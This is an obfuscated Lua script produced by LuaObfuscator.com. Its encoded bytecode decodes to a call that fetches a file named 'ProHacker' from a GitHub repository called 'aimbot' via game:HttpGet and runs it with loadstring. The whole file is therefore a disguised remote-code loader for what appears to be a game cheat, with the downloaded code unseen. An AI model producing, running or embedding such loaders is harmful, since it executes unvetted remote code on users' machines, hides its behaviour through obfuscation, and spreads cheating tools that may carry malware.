--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v81=0;while true do if (v81==0) then v19=v0(v3(v30,1,1));return "";end end else local v82=v2(v0(v30,16));if v19 then local v93=0;local v94;while true do if (v93==1) then return v94;end if (v93==0) then v94=v5(v82,v19);v19=nil;v93=1;end end else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(877 -(282 + 595)) -0 ;local v84;while true do if (v83==0) then v84=(v31/((5 -(1640 -(1523 + 114)))^(v32-(1 + 0))))%((3 -1)^(((v33-(2 -(1 -0))) -(v32-(1066 -(68 + 997)))) + (620 -(555 + 64)))) ;return v84-(v84%(932 -(857 + 74))) ;end end else local v85=(570 -(367 + 201))^(v32-(928 -((1484 -(226 + 1044)) + 713))) ;return (((v31%(v85 + v85))>=v85) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (v35==((217 -99) -(32 + 85))) then return (v37 * (251 + 5)) + v36 ;end if (v35==((0 -0) + 0)) then v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;v35=1;end end end local function v23() local v38=350 -((1039 -(802 + 150)) + 263) ;local v39;local v40;local v41;local v42;while true do if (v38==(181 -(67 + 113))) then return (v42 * (12302277 + 4474939)) + (v41 * (160901 -95365)) + (v40 * 256) + v39 ;end if (v38==0) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + 3 + 1 ;v38=3 -2 ;end end end local function v24() local v43=v23();local v44=v23();local v45=2 -(1 + 0) ;local v46=(v20(v44,1 -(0 -0) ,15 + 5 ) * ((999 -(915 + 82))^((159 -69) -58))) + v43 ;local v47=v20(v44,13 + 8 ,31);local v48=((v20(v44,41 -9 )==(1188 -(1069 + 118))) and  -(2 -1)) or 1 ;if (v47==0) then if (v46==0) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0;end elseif (v47==(3636 -(2027 -(145 + 293)))) then return ((v46==(0 + 0)) and (v48 * ((792 -(368 + 423))/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1041 -(10 + 8)) ) * (v45 + (v46/((7 -(435 -(44 + 386)))^(494 -(416 + 26))))) ;end local function v25(v49) local v50=1486 -(998 + 488) ;local v51;local v52;while true do if (v50==(1 + 2)) then return v6(v52);end if (v50==1) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=7 -5 ;end if (0==v50) then v51=nil;if  not v49 then v49=v23();if (v49==((1631 -(814 + 45)) -(201 + 571))) then return "";end end v50=1139 -(116 + 1022) ;end if ((8 -6)==v50) then v52={};for v95=1 + 0 , #v51 do v52[v95]=v2(v1(v3(v51,v95,v95)));end v50=10 -7 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do if (v53==(1793 -(1563 + 230))) then local v89=(function() return 285 -(134 + 151) ;end)();while true do if (v89~=(1665 -(970 + 695))) then else v54=(function() return function(v114,v115,v116) local v117=(function() return 0;end)();while true do if (0~=v117) then else local v148=(function() return 0 -0 ;end)();local v149=(function() return;end)();while true do if (v148==(1990 -(582 + 1408))) then v149=(function() return 0 -0 ;end)();while true do if (v149==(0 -0)) then v114[v115-#"[" ]=(function() return v116();end)();return v114,v115,v116;end end break;end end end end end;end)();v55=(function() return {};end)();v89=(function() return 3 -2 ;end)();end if (1==v89) then v56=(function() return {};end)();v53=(function() return 1;end)();break;end end end if (v53~=1) then else local v90=(function() return 0;end)();local v91=(function() return;end)();while true do if (v90==0) then v91=(function() return 0;end)();while true do if (v91==(1824 -(1195 + 629))) then v57=(function() return {};end)();v58=(function() return {v55,v56,nil,v57};end)();v91=(function() return 1;end)();end if ((1 -0)==v91) then v59=(function() return v23();end)();v53=(function() return 2;end)();break;end end break;end end end if (v53==2) then v60=(function() return {};end)();for v97= #",",v59 do local v98=(function() return 0;end)();local v99=(function() return;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do if (v98==1) then v101=(function() return nil;end)();while true do if (v99==0) then local v145=(function() return 241 -(187 + 54) ;end)();while true do if (v145~=(780 -(162 + 618))) then else v100=(function() return v21();end)();v101=(function() return nil;end)();v145=(function() return 1;end)();end if (v145==(1 + 0)) then v99=(function() return 1 + 0 ;end)();break;end end end if (v99==(1 -0)) then if (v100== #"|") then v101=(function() return v21()~=(0 -0) ;end)();elseif (v100==2) then v101=(function() return v24();end)();elseif (v100~= #"xnx") then else v101=(function() return v25();end)();end v60[v97]=(function() return v101;end)();break;end end break;end if (0==v98) then local v113=(function() return 0;end)();while true do if (v113==1) then v98=(function() return 1;end)();break;end if (v113~=(0 + 0)) then else v99=(function() return 0;end)();v100=(function() return nil;end)();v113=(function() return 1;end)();end end end end end v58[ #"91("]=(function() return v21();end)();v53=(function() return 1639 -(1373 + 263) ;end)();end if (v53==3) then for v102= #"!",v23() do local v103=(function() return v21();end)();if (v20(v103, #",", #"~")~=(1000 -(451 + 549))) then else local v109=(function() return 0 + 0 ;end)();local v110=(function() return;end)();local v111=(function() return;end)();local v112=(function() return;end)();while true do if (v109==3) then if (v20(v111, #"xnx", #"19(")== #"]") then v112[ #"?id="]=(function() return v60[v112[ #"xnxx"]];end)();end v55[v102]=(function() return v112;end)();break;end if (1~=v109) then else local v141=(function() return 0 -0 ;end)();local v142=(function() return;end)();while true do if (v141~=(0 -0)) then else v142=(function() return 1384 -(746 + 638) ;end)();while true do if (v142==1) then v109=(function() return 2;end)();break;end if (v142~=(0 + 0)) then else v112=(function() return {v22(),v22(),nil,nil};end)();if (v110==0) then local v185=(function() return 0 -0 ;end)();local v186=(function() return;end)();while true do if (0==v185) then v186=(function() return 0;end)();while true do if (0~=v186) then else v112[ #"xnx"]=(function() return v22();end)();v112[ #"0313"]=(function() return v22();end)();break;end end break;end end elseif (v110== #"~") then v112[ #"91("]=(function() return v23();end)();elseif (v110==2) then v112[ #"xxx"]=(function() return v23() -((343 -(218 + 123))^16) ;end)();elseif (v110== #"91(") then local v191=(function() return 0;end)();local v192=(function() return;end)();while true do if (v191~=(1581 -(1535 + 46))) then else v192=(function() return 0;end)();while true do if (v192~=(0 + 0)) then else v112[ #"19("]=(function() return v23() -((1 + 1)^(576 -(306 + 254))) ;end)();v112[ #"?id="]=(function() return v22();end)();break;end end break;end end end v142=(function() return 1 + 0 ;end)();end end break;end end end if (v109~=(0 -0)) then else local v143=(function() return 1467 -(899 + 568) ;end)();local v144=(function() return;end)();while true do if (v143==(0 + 0)) then v144=(function() return 0 -0 ;end)();while true do if (v144==(604 -(268 + 335))) then v109=(function() return 1;end)();break;end if (v144==(290 -(60 + 230))) then v110=(function() return v20(v103,2, #"-19");end)();v111=(function() return v20(v103, #".dev",6);end)();v144=(function() return 1;end)();end end break;end end end if (v109==(574 -(426 + 146))) then if (v20(v111, #">", #"}")~= #"}") then else v112[1 + 1 ]=(function() return v60[v112[1458 -(282 + 1174) ]];end)();end if (v20(v111,813 -(569 + 242) ,5 -3 )~= #"{") then else v112[ #"-19"]=(function() return v60[v112[ #"xxx"]];end)();end v109=(function() return 1 + 2 ;end)();end end end end for v104= #"/",v23() do v56,v104,v28=(function() return v54(v56,v104,v28);end)();end return v58;end end end local function v29(v61,v62,v63) local v64=v61[1025 -(706 + 318) ];local v65=v61[(1630 -(142 + 235)) -(721 + 530) ];local v66=v61[1274 -(945 + 326) ];return function(...) local v67=v64;local v68=v65;local v69=v66;local v70=v27;local v71=2 -1 ;local v72= -((4 -3) + 0);local v73={};local v74={...};local v75=v12("#",...) -(701 -(271 + 429)) ;local v76={};local v77={};for v86=0,v75 do if (v86>=v69) then v73[v86-v69 ]=v74[v86 + 1 + 0 ];else v77[v86]=v74[v86 + 1 + 0 ];end end local v78=(v75-v69) + (978 -(553 + 424)) ;local v79;local v80;while true do v79=v67[v71];v80=v79[1501 -(1408 + 92) ];if (v80<=(5 -2)) then if (v80<=(1087 -(461 + 625))) then if (v80>0) then local v118=1288 -(993 + 295) ;local v119;while true do if (v118==0) then v119=v79[1 + 0 + 1 ];v77[v119]=v77[v119](v13(v77,v119 + (1172 -(418 + 753)) ,v72));break;end end else v77[v79[1 + 1 ]]=v79[1 + 2 ];end elseif ((4372>1850) and (v80>2)) then local v122=0 + 0 ;local v123;local v124;local v125;local v126;while true do if (v122==(0 + 0 + 0)) then v123=v79[2 + 0 ];v124,v125=v70(v77[v123](v13(v77,v123 + (530 -(406 + 123)) ,v79[(754 + 1018) -(1749 + 20) ])));v122=1 + 0 ;end if ((1623<=1957) and (v122==1)) then v72=(v125 + v123) -(1323 -(1249 + 73)) ;v126=0 + 0 ;v122=1147 -(466 + 679) ;end if (v122==(4 -2)) then for v178=v123,v72 do v126=v126 + 1 ;v77[v178]=v124[v126];end break;end end else local v127=v79[5 -(2 + 1) ];local v128=v77[v79[1903 -((229 -123) + 1794) ]];v77[v127 + 1 + (0 -0) ]=v128;v77[v127]=v128[v79[2 + 2 ]];end elseif ((232<821) and (v80<=(14 -9))) then if (v80==4) then v77[v79[5 -3 ]]();else local v132=114 -(4 + 110) ;local v133;local v134;local v135;local v136;local v137;while true do if (v132==(584 -(57 + 527))) then v133=nil;v134,v135=nil;v136=nil;v137=nil;v77[v79[1429 -(41 + 1386) ]]={};v132=104 -(17 + 86) ;end if ((518<902) and (v132==(4 + 1))) then v133=0 -0 ;for v181=v137,v72 do v133=v133 + (2 -1) ;v77[v181]=v134[v133];end v71=v71 + (167 -(122 + 44)) ;v79=v67[v71];v137=v79[2 -(0 -0) ];v132=19 -13 ;end if (v132==(4 + 0)) then v71=v71 + 1 + 0 ;v79=v67[v71];v137=v79[3 -1 ];v134,v135=v70(v77[v137](v13(v77,v137 + ((20 + 46) -(30 + 35)) ,v79[3 + 0 ])));v72=(v135 + v137) -(4 -3) ;v132=1262 -(1043 + 214) ;end if ((4412==4412) and (v132==(11 -8))) then v77[v137 + 1 ]=v136;v77[v137]=v136[v79[1216 -(323 + 889) ]];v71=v71 + (2 -1) ;v79=v67[v71];v77[v79[2]]=v79[583 -(361 + (972 -(239 + 514))) ];v132=324 -(53 + 267) ;end if ((2994>858) and (v132==(1 + 0))) then v71=v71 + (414 -(15 + 140 + 258)) ;v79=v67[v71];v77[v79[984 -(18 + 964) ]]=v63[v79[3]];v71=v71 + (3 -2) ;v79=v67[v71];v132=2 + 0 ;end if ((v132==(5 + 2)) or (3755<=915)) then v79=v67[v71];do return;end break;end if ((1750>=842) and (v132==2)) then v77[v79[852 -(20 + 830) ]]=v63[v79[(1332 -(797 + 532)) + 0 ]];v71=v71 + (127 -(116 + 10)) ;v79=v67[v71];v137=v79[1 + 1 + 0 ];v136=v77[v79[741 -(542 + 196) ]];v132=6 -3 ;end if (v132==(2 + 4)) then v77[v137]=v77[v137](v13(v77,v137 + 1 + 0 + 0 ,v72));v71=v71 + 1 + 0 ;v79=v67[v71];v77[v79[4 -(4 -2) ]]();v71=v71 + (2 -1) ;v132=1558 -(1126 + 425) ;end end end elseif (v80<=(411 -(118 + (1489 -(373 + 829))))) then v77[v79[2]]=v63[v79[11 -8 ]];elseif (v80>(1128 -(118 + (1734 -(476 + 255))))) then v77[v79[5 -3 ]]={};else do return;end end v71=v71 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q0003093Q006F6164737472696E6703043Q0067616D6503073Q00482Q7470476574034D3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F426173686172383036342F61696D626F742F726566732F68656164732F6D61696E2F50726F4861636B657200094Q00057Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
